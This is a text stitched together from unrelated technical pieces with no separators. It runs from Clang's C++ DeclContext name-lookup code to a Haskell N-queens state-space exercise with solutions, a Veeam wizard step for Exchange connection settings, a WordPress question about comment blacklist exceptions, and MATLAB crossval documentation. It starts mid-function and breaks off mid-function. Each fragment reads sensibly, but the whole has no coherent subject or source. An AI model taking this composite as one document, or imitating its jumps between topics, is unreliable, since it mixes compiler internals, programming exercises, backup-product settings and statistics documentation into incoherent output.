D->NextInContextAndBits.setPointer(nullptr);
// Remove D from the lookup table if necessary.
if (isa<NamedDecl>(D)) {
NamedDecl *ND = cast<NamedDecl>(D);
// Remove only decls that have a name
if (!ND->getDeclName()) return;
auto *DC = this;
do {
StoredDeclsMap *Map = DC->getPrimaryContext()->LookupPtr;
if (Map) {
StoredDeclsMap::iterator Pos = Map->find(ND->getDeclName());
assert(Pos != Map->end() && "no lookup entry for decl");
if (Pos->second.getAsVector() || Pos->second.getAsDecl() == ND)
Pos->second.remove(ND);
}
} while (DC->isTransparentContext() && (DC = DC->getParent()));
}
}
void DeclContext::addHiddenDecl(Decl *D) {
assert(D->getLexicalDeclContext() == this &&
"Decl inserted into wrong lexical context");
assert(!D->getNextDeclInContext() && D != LastDecl &&
"Decl already inserted into a DeclContext");
if (FirstDecl) {
LastDecl->NextInContextAndBits.setPointer(D);
LastDecl = D;
} else {
FirstDecl = LastDecl = D;
}
// Notify a C++ record declaration that we've added a member, so it can
// update its class-specific state.
if (CXXRecordDecl *Record = dyn_cast<CXXRecordDecl>(this))
Record->addedMember(D);
// If this is a newly-created (not de-serialized) import declaration, wire
// it in to the list of local import declarations.
if (!D->isFromASTFile()) {
if (ImportDecl *Import = dyn_cast<ImportDecl>(D))
D->getASTContext().addedLocalImportDecl(Import);
}
}
void DeclContext::addDecl(Decl *D) {
addHiddenDecl(D);
if (NamedDecl *ND = dyn_cast<NamedDecl>(D))
ND->getDeclContext()->getPrimaryContext()->
makeDeclVisibleInContextWithFlags(ND, false, true);
}
void DeclContext::addDeclInternal(Decl *D) {
addHiddenDecl(D);
if (NamedDecl *ND = dyn_cast<NamedDecl>(D))
ND->getDeclContext()->getPrimaryContext()->
makeDeclVisibleInContextWithFlags(ND, true, true);
}
/// shouldBeHidden - Determine whether a declaration which was declared
/// within its semantic context should be invisible to qualified name lookup.
static bool shouldBeHidden(NamedDecl *D) {
// Skip unnamed declarations.
if (!D->getDeclName())
return true;
// Skip entities that can't be found by name lookup into a particular
// context.
if ((D->getIdentifierNamespace() == 0 && !isa<UsingDirectiveDecl>(D)) ||
D->isTemplateParameter())
return true;
// Skip template specializations.
// FIXME: This feels like a hack. Should DeclarationName support
// template-ids, or is there a better way to keep specializations
// from being visible?
if (isa<ClassTemplateSpecializationDecl>(D))
return true;
if (FunctionDecl *FD = dyn_cast<FunctionDecl>(D))
if (FD->isFunctionTemplateSpecialization())
return true;
return false;
}
/// buildLookup - Build the lookup data structure with all of the
/// declarations in this DeclContext (and any other contexts linked
/// to it or transparent contexts nested within it) and return it.
///
/// Note that the produced map may miss out declarations from an
/// external source. If it does, those entries will be marked with
/// the 'hasExternalDecls' flag.
StoredDeclsMap *DeclContext::buildLookup() {
assert(this == getPrimaryContext() && "buildLookup called on non-primary DC");
if (!HasLazyLocalLexicalLookups && !HasLazyExternalLexicalLookups)
return LookupPtr;
SmallVector<DeclContext *, 2> Contexts;
collectAllContexts(Contexts);
if (HasLazyExternalLexicalLookups) {
HasLazyExternalLexicalLookups = false;
for (auto *DC : Contexts) {
if (DC->hasExternalLexicalStorage())
HasLazyLocalLexicalLookups |=
DC->LoadLexicalDeclsFromExternalStorage();
}
if (!HasLazyLocalLexicalLookups)
return LookupPtr;
}
for (auto *DC : Contexts)
buildLookupImpl(DC, hasExternalVisibleStorage());
// We no longer have any lazy decls.
HasLazyLocalLexicalLookups = false;
return LookupPtr;
}
/// buildLookupImpl - Build part of the lookup data structure for the
/// declarations contained within DCtx, which will either be this
/// DeclContext, a DeclContext linked to it, or a transparent context
/// nested within it.
void DeclContext::buildLookupImpl(DeclContext *DCtx, bool Internal) {
for (Decl *D : DCtx->noload_decls()) {
// Insert this declaration into the lookup structure, but only if
// it's semantically within its decl context. Any other decls which
// should be found in this context are added eagerly.
//
// If it's from an AST file, don't add it now. It'll get handled by
// FindExternalVisibleDeclsByName if needed. Exception: if we're not
// in C++, we do not track external visible decls for the TU, so in
// that case we need to collect them all here.
if (NamedDecl *ND = dyn_cast<NamedDecl>(D))
if (ND->getDeclContext() == DCtx && !shouldBeHidden(ND) &&
(!ND->isFromASTFile() ||
(isTranslationUnit() &&
!getParentASTContext().getLangOpts().CPlusPlus)))
makeDeclVisibleInContextImpl(ND, Internal);
// If this declaration is itself a transparent declaration context
// or inline namespace, add the members of this declaration of that
// context (recursively).
if (DeclContext *InnerCtx = dyn_cast<DeclContext>(D))
if (InnerCtx->isTransparentContext() || InnerCtx->isInlineNamespace())
buildLookupImpl(InnerCtx, Internal);
}
}
NamedDecl *const DeclContextLookupResult::SingleElementDummyList = nullptr;
DeclContext::lookup_result
DeclContext::lookup(DeclarationName Name) const {
assert(DeclKind != Decl::LinkageSpec &&
"Should not perform lookups into linkage specs!");
const DeclContext *PrimaryContext = getPrimaryContext();
if (PrimaryContext != this)
return PrimaryContext->lookup(Name);
// If we have an external source, ensure that any later redeclarations of this
// context have been loaded, since they may add names to the result of this
// lookup (or add external visible storage).
ExternalASTSource *Source = getParentASTContext().getExternalSource();
if (Source)
(void)cast<Decl>(this)->getMostRecentDecl();
if (hasExternalVisibleStorage()) {
assert(Source && "external visible storage but no external source?");
if (NeedToReconcileExternalVisibleStorage)
reconcileExternalVisibleStorage();
StoredDeclsMap *Map = LookupPtr;
if (HasLazyLocalLexicalLookups || HasLazyExternalLexicalLookups)
// FIXME: Make buildLookup const?
Map = const_cast<DeclContext*>(this)->buildLookup();
if (!Map)
Map = CreateStoredDeclsMap(getParentASTContext());
// If we have a lookup result with no external decls, we are done.
std::pair<StoredDeclsMap::iterator, bool> R =
Map->insert(std::make_pair(Name, StoredDeclsList()));
if (!R.second && !R.first->second.hasExternalDecls())
return R.first->second.getLookupResult();
if (Source->FindExternalVisibleDeclsByName(this, Name) || !R.second) {
if (StoredDeclsMap *Map = LookupPtr) {
StoredDeclsMap::iterator I = Map->find(Name);
if (I != Map->end())
return I->second.getLookupResult();
}
}
return lookup_result();
}
StoredDeclsMap *Map = LookupPtr;
if (HasLazyLocalLexicalLookups || HasLazyExternalLexicalLookups)
Map = const_cast<DeclContext*>(this)->buildLookup();
if (!Map)
return lookup_result();
StoredDeclsMap::iterator I = Map->find(Name);
if (I == Map->end())
return lookup_result();
return I->second.getLookupResult();
}
DeclContext::lookup_result
DeclContext::noload_lookup(DeclarationName Name) {
assert(DeclKind != Decl::LinkageSpec &&
"Should not perform lookups into linkage specs!");
DeclContext *PrimaryContext = getPrimaryContext();
if (PrimaryContext != this)
return PrimaryContext->noload_lookup(Name);
// If we have any lazy lexical declarations not in our lookup map, add them
// now. Don't import any external declarations, not even if we know we have
// some missing from the external visible lookups.
if (HasLazyLocalLexicalLookups) {
SmallVector<DeclContext *, 2> Contexts;
collectAllContexts(Contexts);
for (unsigned I = 0, N = Contexts.size(); I != N; ++I)
buildLookupImpl(Contexts[I], hasExternalVisibleStorage());
HasLazyLocalLexicalLookups = false;
}
StoredDeclsMap *Map = LookupPtr;
if (!Map)
return lookup_result();
StoredDeclsMap::iterator I = Map->find(Name);
return I != Map->end() ? I->second.getLookupResult()
: lookup_result();
}
void DeclContext::localUncachedLookup(DeclarationName Name,
SmallVectorImpl<NamedDecl *> &Results) {
Results.clear();
// If there's no external storage, just perform a normal lookup and copy
// the results.
if (!hasExternalVisibleStorage() && !hasExternalLexicalStorage() && Name) {
lookup_result LookupResults = lookup(Name);
Results.insert(Results.end(), LookupResults.begin(), LookupResults.end());
return;
}
// If we have a lookup table, check there first. Maybe we'll get lucky.
// FIXME: Should we be checking these flags on the primary context?
if (Name && !HasLazyLocalLexicalLookups && !HasLazyExternalLexicalLookups) {
if (StoredDeclsMap *Map = LookupPtr) {
StoredDeclsMap::iterator Pos = Map->find(Name);
if (Pos != Map->end()) {
Results.insert(Results.end(),
Pos->second.getLookupResult().begin(),
Pos->second.getLookupResult().end());
return;
}
}
}
// Slow case: grovel through the declarations in our chain looking for
// matches.
// FIXME: If we have lazy external declarations, this will not find them!
// FIXME: Should we CollectAllContexts and walk them all here?
for (Decl *D = FirstDecl; D; D = D->getNextDeclInContext()) {
if (NamedDecl *ND = dyn_cast<NamedDecl>(D))
if (ND->getDeclName() == Name)
Results.push_back(ND);
}
}
DeclContext *DeclContext::getRedeclContext() {
DeclContext *Ctx = this;
// Skip through transparent contexts.
while (Ctx->isTransparentContext())
Ctx = Ctx->getParent();
return Ctx;
}
DeclContext *DeclContext::getEnclosingNamespaceContext() {
DeclContext *Ctx = this;
// Skip through non-namespace, non-translation-unit contexts.
while (!Ctx->isFileContext())
Ctx = Ctx->getParent();
return Ctx->getPrimaryContext();
}
RecordDecl *DeclContext::getOuterLexicalRecordContext() {
// Loop until we find a non-record context.
RecordDecl *OutermostRD = nullptr;
DeclContext *DC = this;
while (DC->isRecord()) {
OutermostRD = cast<RecordDecl>(DC);
DC = DC->getLexicalParent();
}
return OutermostRD;
}
bool DeclContext::InEnclosingNamespaceSetOf(const DeclContext *O) const {
// For non-file contexts, this is equivalent to Equals.
if (!isFileContext())
return O->Equals(this);
do {
if (O->Equals(this))
return true;
const NamespaceDecl *NS = dyn_cast<NamespaceDecl>(O);
if (!NS || !NS->isInline())
break;
O = NS->getParent();
} while (O);
return false;
}
void DeclContext::makeDeclVisibleInContext(NamedDecl *D) {
DeclContext *PrimaryDC = this->getPrimaryContext();
DeclContext *DeclDC = D->getDeclContext()->getPrimaryContext();
// If the decl is being added outside of its semantic decl context, we
// need to ensure that we eagerly build the lookup information for it.
PrimaryDC->makeDeclVisibleInContextWithFlags(D, false, PrimaryDC == DeclDC);
}
void DeclContext::makeDeclVisibleInContextWithFlags(NamedDecl *D, bool Internal,
bool Recoverable) {
assert(this == getPrimaryContext() && "expected a primary DC");
if (!isLookupContext()) {
if (isTransparentContext())
getParent()->getPrimaryContext()
->makeDeclVisibleInContextWithFlags(D, Internal, Recoverable);
return;
}
// Skip declarations which should be invisible to name lookup.
if (shouldBeHidden(D))
return;
// If we already have a lookup data structure, perform the insertion into
// it. If we might have externally-stored decls with this name, look them
// up and perform the insertion. If this decl was declared outside its
// semantic context, buildLookup won't add it, so add it now.
//
// FIXME: As a performance hack, don't add such decls into the translation
// unit unless we're in C++, since qualified lookup into the TU is never
// performed.
if (LookupPtr || hasExternalVisibleStorage() ||
((!Recoverable || D->getDeclContext() != D->getLexicalDeclContext()) &&
(getParentASTContext().getLangOpts().CPlusPlus ||
!isTranslationUnit()))) {
// If we have lazily omitted any decls, they might have the same name as
// the decl which we are adding, so build a full lookup table before adding
// this decl.
buildLookup();
makeDeclVisibleInContextImpl(D, Internal);
} else {
HasLazyLocalLexicalLookups = true;
}
// If we are a transparent context or inline namespace, insert into our
// parent context, too. This operation is recursive.
if (isTransparentContext() || isInlineNamespace())
getParent()->getPrimaryContext()->
makeDeclVisibleInContextWithFlags(D, Internal, Recoverable);
Decl *DCAsDecl = cast<Decl>(this);
// Notify that a decl was made visible unless we are a Tag being defined.
if (!(isa<TagDecl>(DCAsDecl) && cast<TagDecl>(DCAsDecl)->isBeingDefined()))
if (ASTMutationListener *L = DCAsDecl->getASTMutationListener())
L->AddedVisibleDecl(this, D);
}
void DeclContext::makeDeclVisibleInContextImpl(NamedDecl *D, bool Internal) {
// Find or create the stored declaration map.
StoredDeclsMap *Map = LookupPtr;
if (!Map) {
ASTContext *C = &getParentASTContext();
Map = CreateStoredDeclsMap(*C);
}
// If there is an external AST source, load any declarations it knows about
// with this declaration's name.
// If the lookup table contains an entry about this name it means that we
// have already checked the external source.
if (!Internal)
if (ExternalASTSource *Source = getParentASTContext().getExternalSource())
if (hasExternalVisibleStorage() &&
Map->find(D->getDeclName()) == Map->end())
Source->FindExternalVisibleDeclsByName(this, D->getDeclName());
// Insert this declaration into the map.
StoredDeclsList &DeclNameEntries = (*Map)[D->getDeclName()];
if (Internal) {
// If this is being added as part of loading an external declaration,
// this may not be the only external declaration with this name.
// In this case, we never try to replace an existing declaration; we'll
// handle that when we finalize the list of declarations for this name.
DeclNameEntries.setHasExternalDecls();
DeclNameEntries.AddSubsequentDecl(D);
return;
}
if (DeclNameEntries.isNull()) {
DeclNameEntries.setOnlyValue(D);
return;
}
if (DeclNameEntries.HandleRedeclaration(D, /*IsKnownNewer*/!Internal)) {
// This declaration has replaced an existing one for which
// declarationReplaces returns true.
return;
}
// Put this declaration into the appropriate slot.
DeclNameEntries.AddSubsequentDecl(D);
}
UsingDirectiveDecl *DeclContext::udir_iterator::operator*() const {
return cast<UsingDirectiveDecl>(*I);
}
/// Returns iterator range [First, Last) of UsingDirectiveDecls stored within
/// this context.
DeclContext::udir_range DeclContext::using_directives() const {
// FIXME: Use something more efficient than normal lookup for using
// directives. In C++, using directives are looked up more than anything else.
lookup_result Result = lookup(UsingDirectiveDecl::getName());
return udir_range(Result.begin(), Result.end());
}
//===----------------------------------------------------------------------===//
// Creation and Destruction of StoredDeclsMaps. //
//===----------------------------------------------------------------------===//
StoredDeclsMap *DeclContext::CreateStoredDeclsMap(ASTContext &C) const {
assert(!LookupPtr && "context already has a decls map");
assert(getPrimaryContext() == this &&
"creating decls map on non-primary context");
StoredDeclsMap *M;
bool Dependent = isDependentContext();
if (Dependent)
M = new DependentStoredDeclsMap();
else
M = new StoredDeclsMap();
M->Previous = C.LastSDM;
C.LastSDM = llvm::PointerIntPair<StoredDeclsMap*,1>(M, Dependent);
LookupPtr = M;
return M;
}
void ASTContext::ReleaseDeclContextMaps() {
// It's okay to delete DependentStoredDeclsMaps via a StoredDeclsMap
// pointer because the subclass doesn't add anything that needs to
// be deleted.
StoredDeclsMap::DestroyAll(LastSDM.getPointer(), LastSDM.getInt());
}
void StoredDeclsMap::DestroyAll(StoredDeclsMap *Map, bool Dependent) {
while (Map) {
// Advance the iteration before we invalidate memory.
llvm::PointerIntPair<StoredDeclsMap*,1> Next = Map->Previous;
if (Dependent)
delete static_cast<DependentStoredDeclsMap*>(Map);
else
delete Map;
Map = Next.getPointer();
Dependent = Next.getInt();
}
}
DependentDiagnostic *DependentDiagnostic::Create(ASTContext &C,
DeclContext *Parent,
const PartialDiagnostic &PDiag) {
assert(Parent->isDependentContext()
&& "cannot iterate dependent diagnostics of non-dependent context");
Parent = Parent->getPrimaryContext();
if (!Parent->LookupPtr)
Parent->CreateStoredDeclsMap(C);
DependentStoredDeclsMap *Map =
static_cast<DependentStoredDeclsMap *>(Parent->LookupPtr);
// Allocate the copy of the PartialDiagnostic via the ASTContext's
// BumpPtrAllocator, rather than the ASTContext itself.
PartialDiagnostic::Storage *DiagStorage = nullptr;
if (PDiag.hasStorage())
DiagStorage = new (C) PartialDiagnostic::Storage;
DependentDiagnostic *DD = new (C) DependentDiagnostic(PDiag, DiagStorage);
// TODO: Maybe we shouldn't reverse the order during insertion.
DD->NextDiagnostic = Map->FirstDiagnostic;
Map->FirstDiagnostic = DD;
return DD;
}
State space of the N-queens problem
The N-queens problem consists of placing N queens on an N-by-N board so that no two of them lie on the same line: horizontal, vertical or diagonal. For example, one solution to the 4-queens problem is
|---|---|---|---|
| | R | | |
|---|---|---|---|
| | | | R |
|---|---|---|---|
| R | | | |
|---|---|---|---|
| | | R | |
|---|---|---|---|
The states of the N-queens problem are the boards with the queens placed so far. Initially the board is empty and, at each step, a queen is placed in the first column that does not yet contain one.
Each state is represented by a list of numbers indicating the rows in which the queens have been placed. For example, the board above is represented by [2,4,1,3].
Using the tree library Data.Tree, define the functions
arbolReinas :: Int -> Tree [Int]
nEstados :: Int -> Int
soluciones :: Int -> [[Int]]
nSoluciones :: Int -> Int
such that
• (arbolReinas n) is the tree of states for the n-queens problem. For example,
λ> putStrLn (drawTree (fmap show (arbolReinas 4)))
[]
|
+- [1]
| |
| +- [3,1]
| |
| `- [4,1]
| |
| `- [2,4,1]
|
+- [2]
| |
| `- [4,2]
| |
| `- [1,4,2]
| |
| `- [3,1,4,2]
|
+- [3]
| |
| `- [1,3]
| |
| `- [4,1,3]
| |
| `- [2,4,1,3]
|
`- [4]
|
+- [1,4]
| |
| `- [3,1,4]
|
`- [2,4]
λ> putStrLn (drawTree (fmap show (arbolReinas 5)))
[]
|
+- [1]
| |
| +- [3,1]
| | |
| | `- [5,3,1]
| | |
| | `- [2,5,3,1]
| | |
| | `- [4,2,5,3,1]
| |
| +- [4,1]
| | |
| | `- [2,4,1]
| | |
| | `- [5,2,4,1]
| | |
| | `- [3,5,2,4,1]
| |
| `- [5,1]
| |
| `- [2,5,1]
|
+- [2]
| |
| +- [4,2]
| | |
| | `- [1,4,2]
| | |
| | `- [3,1,4,2]
| | |
| | `- [5,3,1,4,2]
| |
| `- [5,2]
| |
| +- [1,5,2]
| | |
| | `- [4,1,5,2]
| |
| `- [3,5,2]
| |
| `- [1,3,5,2]
| |
| `- [4,1,3,5,2]
|
+- [3]
| |
| +- [1,3]
| | |
| | `- [4,1,3]
| | |
| | `- [2,4,1,3]
| | |
| | `- [5,2,4,1,3]
| |
| `- [5,3]
| |
| `- [2,5,3]
| |
| `- [4,2,5,3]
| |
| `- [1,4,2,5,3]
|
+- [4]
| |
| +- [1,4]
| | |
| | +- [3,1,4]
| | | |
| | | `- [5,3,1,4]
| | | |
| | | `- [2,5,3,1,4]
| | |
| | `- [5,1,4]
| | |
| | `- [2,5,1,4]
| |
| `- [2,4]
| |
| `- [5,2,4]
| |
| `- [3,5,2,4]
| |
| `- [1,3,5,2,4]
|
`- [5]
|
+- [1,5]
| |
| `- [4,1,5]
|
+- [2,5]
| |
| `- [4,2,5]
| |
| `- [1,4,2,5]
| |
| `- [3,1,4,2,5]
|
`- [3,5]
|
`- [1,3,5]
|
`- [4,1,3,5]
|
`- [2,4,1,3,5]
• (nEstados n) is the number of states in the n-queens problem. For example,
nEstados 4 == 17
nEstados 5 == 54
map nEstados [0..10] == [1,2,3,6,17,54,153,552,2057,8394,35539]
• (soluciones n) is the list of states that are solutions of the n-queens problem. For example,
λ> soluciones 4
[[3,1,4,2],[2,4,1,3]]
λ> soluciones 5
[[4,2,5,3,1],[3,5,2,4,1],[5,3,1,4,2],[4,1,3,5,2],[5,2,4,1,3],
[1,4,2,5,3],[2,5,3,1,4],[1,3,5,2,4],[3,1,4,2,5],[2,4,1,3,5]]
• (nSoluciones n) is the number of solutions of the n-queens problem. For example,
nSoluciones 4 == 2
nSoluciones 5 == 10
map nSoluciones [0..10] == [1,1,0,0,2,10,4,40,92,352,724]
Solutions
import Data.List ((\\))
import Data.Tree
-- Definition of arbolReinas
-- =========================
arbolReinas :: Int -> Tree [Int]
arbolReinas n = expansion n []
where
expansion m xs = Node xs [expansion (m-1) ys | ys <- sucesores n xs]
-- (sucesores n xs) is the list of successors of the state xs in the
-- n-queens problem. For example,
-- sucesores 4 [] == [[1],[2],[3],[4]]
-- sucesores 4 [1] == [[3,1],[4,1]]
-- sucesores 4 [4,1] == [[2,4,1]]
-- sucesores 4 [2,4,1] == []
sucesores :: Int -> [Int] -> [[Int]]
sucesores n xs = [y:xs | y <- [1..n] \\ xs
, noAtaca y xs 1]
-- (noAtaca y xs d) holds if the queen in row y does not attack the queens
-- placed in the rows xs, where d is the number of columns between the
-- position of y and the first element of xs.
noAtaca :: Int -> [Int] -> Int -> Bool
noAtaca _ [] _ = True
noAtaca y (x:xs) distH = abs(y-x) /= distH &&
noAtaca y xs (distH + 1)
-- Definition of nEstados
-- ======================
nEstados :: Int -> Int
nEstados = length . arbolReinas
-- Definition of soluciones
-- ==============================
-- λ> soluciones 4
-- [[3,1,4,2],[2,4,1,3]]
-- λ> soluciones 5
-- [[4,2,5,3,1],[3,5,2,4,1],[5,3,1,4,2],[4,1,3,5,2],[5,2,4,1,3],
-- [1,4,2,5,3],[2,5,3,1,4],[1,3,5,2,4],[3,1,4,2,5],[2,4,1,3,5]]
soluciones :: Int -> [[Int]]
soluciones n =
filter (\xs -> length xs == n) (estados n)
-- (estados n) is the list of states of the n-queens problem. For
-- example,
-- λ> estados 4
-- [[],
-- [1],[2],[3],[4],
-- [3,1],[4,1],[4,2],[1,3],[1,4],[2,4],
-- [2,4,1],[1,4,2],[4,1,3],[3,1,4],
-- [3,1,4,2],[2,4,1,3]]
estados :: Int -> [[Int]]
estados = concat . levels . arbolReinas
-- Definition of nSoluciones
-- =========================
nSoluciones :: Int -> Int
nSoluciones = length . soluciones
One solution to “State space of the N-queens problem”
1. fercarnav
import Data.List
import Data.Tree
arbolReinas :: Int -> Tree [Int]
arbolReinas n = unfoldTree f [] where
f xs
| length xs > n = (xs,[])
| length xs == 0 = (xs,[[k] | k <-[1..n]])
| otherwise = (xs,[k:xs | k <- [1..n],
condicion k xs 1,
abs (head xs - k) >=2,
notElem k xs] )
condicion y [] _ = True
condicion y (x:xs) p = abs (y-x) /= p && condicion y xs (p+1)
nEstados :: Int -> Int
nEstados = length . flatten . arbolReinas
soluciones :: Int -> [[Int]]
soluciones n = filter ((==n) . length) (concat (levels (arbolReinas n)))
nSoluciones :: Int -> Int
nSoluciones = length . soluciones
Step 3. Specify Microsoft Exchange Connection Settings
At this step of the wizard, specify a Microsoft Exchange server to which you want to connect, provide authentication credentials, assign permissions and configure advanced settings.
To specify connection settings to the on-premises Microsoft Exchange server, do the following:
1. In the Server name field, specify a Microsoft Exchange server to which you want to connect.
You can use a DNS name of a server, NetBIOS name or its IP address. Make sure that the server has the Mailbox Server role.
2. In the Username and Password fields, specify authentication credentials to connect to the Microsoft Exchange server.
You must provide a user account in one of the following formats: domain\account or account@domain. Note that ADFS accounts cannot be used to add on-premises Microsoft organizations; only Microsoft 365 organizations can be added with non-MFA-enabled ADFS accounts.
3. Select the Grant this account required roles and permissions check box to automatically assign the ApplicationImpersonation role.
Make sure the account that you use is a member of the Organization Management group and has been granted the Role Management role in advance. Otherwise, the automatic assignment of the ApplicationImpersonation role will fail; an organization will not be added.
For more information about the required roles and permissions, see Veeam Backup Account Permissions.
4. Select the Configure throttling policy check box to set the throttling policy for the account being used to Unlimited.
Adding Microsoft On-premises Exchange Organization
5. Click Advanced if you want to configure whether to connect to the Microsoft Exchange server using SSL and to skip one or more SSL verifications. To do this, select or clear any of the following check boxes:
• Connect using SSL
• Skip certificate trusted authority verification
• Skip certificate common name verification
• Skip revocation check
How can certain words be allowed in comments?
Question
I want to improve the WordPress blacklist. WordPress holds a comment for moderation when it catches a word that was added to the blacklist, but this creates a problem because WordPress matches substrings. For example, if we blacklist the word "press", then a comment containing the word "WordPress" will also be trashed.
In this example only the standalone word "press" should be banned; an exception must be added so that the word "WordPress" is allowed. In short, I want to maintain a list of allowed words that are permitted even though they match entries in the blacklist filter.
How can we do this in functions.php?
crossval
Estimate loss using cross-validation
Description
err = crossval(criterion,X,y,'Predfun',predfun) returns a 10-fold cross-validation error estimate for the function predfun based on the specified criterion, either 'mse' (mean squared error) or 'mcr' (misclassification rate). The rows of X and y correspond to observations, and the columns of X correspond to predictor variables.
In this case, crossval performs 10-fold cross-validation as follows:
1. Split the observations in the predictor data X and the response variable y into 10 groups, each of which has approximately the same number of observations.
2. Use the last nine groups of observations to train a model as specified in predfun. Use the first group of observations as test data, pass the test predictor data to the trained model, and compute predicted values as specified in predfun. Compute the error specified by criterion.
3. Use the first group and the last eight groups of observations to train a model as specified in predfun. Use the second group of observations as test data, pass the test data to the trained model, and compute predicted values as specified in predfun. Compute the error specified by criterion.
4. Proceed in a similar manner until each group of observations is used as test data exactly once.
5. Return the mean error estimate as the scalar err.
err = crossval(criterion,X1,...,XN,y,'Predfun',predfun) returns a 10-fold cross-validation error estimate for predfun by using the predictor variables X1 through XN and the response variable y.
values = crossval(fun,X) performs 10-fold cross-validation for the function fun, applied to the data in X. The rows of X correspond to observations, and the columns of X correspond to variables.
crossval typically performs 10-fold cross-validation as follows:
1. Split the data in X into 10 groups, each of which has approximately the same number of observations.
2. Use the last nine groups of data to train a model as specified in fun. Use the first group of data as a test set, pass the test set to the trained model, and compute some value (for example, loss) as specified in fun.
3. Use the first group and the last eight groups of data to train a model as specified in fun. Use the second group of data as a test set, pass the test set to the trained model, and compute some value as specified in fun.
4. Proceed in a similar manner until each group of data is used as a test set exactly once.
5. Return the 10 computed values as the vector values.
values = crossval(fun,X1,...,XN) performs 10-fold cross-validation for the function fun, applied to the data in X1,...,XN. Every data set, X1 through XN, must have the same number of observations and, therefore, the same number of rows.
___ = crossval(___,Name,Value) specifies cross-validation options using one or more name-value pair arguments in addition to any of the input argument combinations and output arguments in previous syntaxes. For example, 'KFold',5 specifies to perform 5-fold cross-validation.
Examples
Compute the mean squared error of a regression model by using 10-fold cross-validation.
Load the carsmall data set. Put the acceleration, horsepower, weight, and miles per gallon (MPG) values into the matrix data. Remove any rows that contain NaN values.
load carsmall
data = [Acceleration Horsepower Weight MPG];
data(any(isnan(data),2),:) = [];
Specify the last column of data, which corresponds to MPG, as the response variable y. Specify the other columns of data as the predictor data X. Add a column of ones to X when your regression function uses regress, as in this example.
Note: regress is useful when you simply need the coefficient estimates or residuals of a regression model. If you need to investigate a fitted regression model further, create a linear regression model object by using fitlm. For an example that uses fitlm and crossval, see Compute Mean Absolute Error Using Cross-Validation.
y = data(:,4);
X = [ones(length(y),1) data(:,1:3)];
Create the custom function regf (shown at the end of this example). This function fits a regression model to training data and then computes predicted values on a test set.
Note: If you use the live script file for this example, the regf function is already included at the end of the file. Otherwise, you need to create this function at the end of your .m file or add it as a file on the MATLAB® path.
Compute the default 10-fold cross-validation mean squared error for the regression model with predictor data X and response variable y.
rng('default') % For reproducibility
cvMSE = crossval('mse',X,y,'Predfun',@regf)
cvMSE = 17.5399
This code creates the function regf.
function yfit = regf(Xtrain,ytrain,Xtest)
b = regress(ytrain,Xtrain);
yfit = Xtest*b;
end
Compute the misclassification error of a logistic regression model trained on numeric and categorical predictor data by using 10-fold cross-validation.
Load the patients data set. Specify the numeric variables Diastolic and Systolic and the categorical variable Gender as predictors, and specify Smoker as the response variable.
load patients
X1 = Diastolic;
X2 = categorical(Gender);
X3 = Systolic;
y = Smoker;
Create the custom function classf (shown at the end of this example). This function fits a logistic regression model to training data and then classifies test data.
Note: If you use the live script file for this example, the classf function is already included at the end of the file. Otherwise, you need to create this function at the end of your .m file or add it as a file on the MATLAB® path.
Compute the 10-fold cross-validation misclassification error for the model with predictor data X1, X2, and X3 and response variable y. Specify 'Stratify',y to ensure that training and test sets have roughly the same proportion of smokers.
rng('default') % For reproducibility
err = crossval('mcr',X1,X2,X3,y,'Predfun',@classf,'Stratify',y)
err = 0.1100
This code creates the function classf.
function pred = classf(X1train,X2train,X3train,ytrain,X1test,X2test,X3test)
Xtrain = table(X1train,X2train,X3train,ytrain, ...
'VariableNames',{'Diastolic','Gender','Systolic','Smoker'});
Xtest = table(X1test,X2test,X3test, ...
'VariableNames',{'Diastolic','Gender','Systolic'});
modelspec = 'Smoker ~ Diastolic + Gender + Systolic';
mdl = fitglm(Xtrain,modelspec,'Distribution','binomial');
yfit = predict(mdl,Xtest);
pred = (yfit > 0.5);
end
For a given number of clusters, compute the cross-validated sum of squared distances between observations and their nearest cluster center. Compare the results for one through ten clusters.
Load the fisheriris data set. X is the matrix meas, which contains flower measurements for 150 different flowers.
load fisheriris
X = meas;
Create the custom function clustf (shown at the end of this example). This function performs the following steps:
1. Standardize the training data.
2. Separate the training data into k clusters.
3. Transform the test data using the training data mean and standard deviation.
4. Compute the distance from each test data point to the nearest cluster center, or centroid.
5. Compute the sum of the squares of the distances.
Note: If you use the live script file for this example, the clustf function is already included at the end of the file. Otherwise, you need to create the function at the end of your .m file or add it as a file on the MATLAB® path.
Create a for loop that specifies the number of clusters k for each iteration. For each fixed number of clusters, pass the corresponding clustf function to crossval. Because crossval performs 10-fold cross-validation by default, the software computes 10 sums of squared distances, one for each partition of training and test data. Take the sum of those values; the result is the cross-validated sum of squared distances for the given number of clusters.
rng('default') % For reproducibility
cvdist = zeros(10,1);
for k = 1:10
fun = @(Xtrain,Xtest)clustf(Xtrain,Xtest,k);
distances = crossval(fun,X);
cvdist(k) = sum(distances);
end
Plot the cross-validated sum of squared distances for each number of clusters.
plot(cvdist)
xlabel('Number of Clusters')
ylabel('CV Sum of Squared Distances')
In general, when determining how many clusters to use, consider the greatest number of clusters that corresponds to a significant decrease in the cross-validated sum of squared distances. For this example, using two or three clusters seems appropriate, but using more than three clusters does not.
This code creates the function clustf.
function distances = clustf(Xtrain,Xtest,k)
[Ztrain,Zmean,Zstd] = zscore(Xtrain);
[~,C] = kmeans(Ztrain,k); % Creates k clusters
Ztest = (Xtest-Zmean)./Zstd;
d = pdist2(C,Ztest,'euclidean','Smallest',1);
distances = sum(d.^2);
end
Compute the mean absolute error of a regression model by using 10-fold cross-validation.
Load the carsmall data set. Specify the Acceleration and Displacement variables as predictors and the Weight variable as the response.
load carsmall
X1 = Acceleration;
X2 = Displacement;
y = Weight;
Create the custom function regf (shown at the end of this example). This function fits a regression model to training data and then computes predicted car weights on a test set. The function compares the predicted car weight values to the true values, and then computes the mean absolute error (MAE) and the MAE adjusted to the range of the test set car weights.
Note: If you use the live script file for this example, the regf function is already included at the end of the file. Otherwise, you need to create this function at the end of your .m file or add it as a file on the MATLAB® path.
By default, crossval performs 10-fold cross-validation. For each of the 10 training and test set partitions of the data in X1, X2, and y, compute the MAE and adjusted MAE values using the regf function. Find the mean MAE and mean adjusted MAE.
rng('default') % For reproducibility
values = crossval(@regf,X1,X2,y)
values = 10×2
319.2261 0.1132
342.3722 0.1240
214.3735 0.0902
174.7247 0.1128
189.4835 0.0832
249.4359 0.1003
194.4210 0.0845
348.7437 0.1700
283.1761 0.1187
210.7444 0.1325
mean(values)
ans = 1×2
252.6701 0.1129
This code creates the function regf.
function errors = regf(X1train,X2train,ytrain,X1test,X2test,ytest)
tbltrain = table(X1train,X2train,ytrain, ...
'VariableNames',{'Acceleration','Displacement','Weight'});
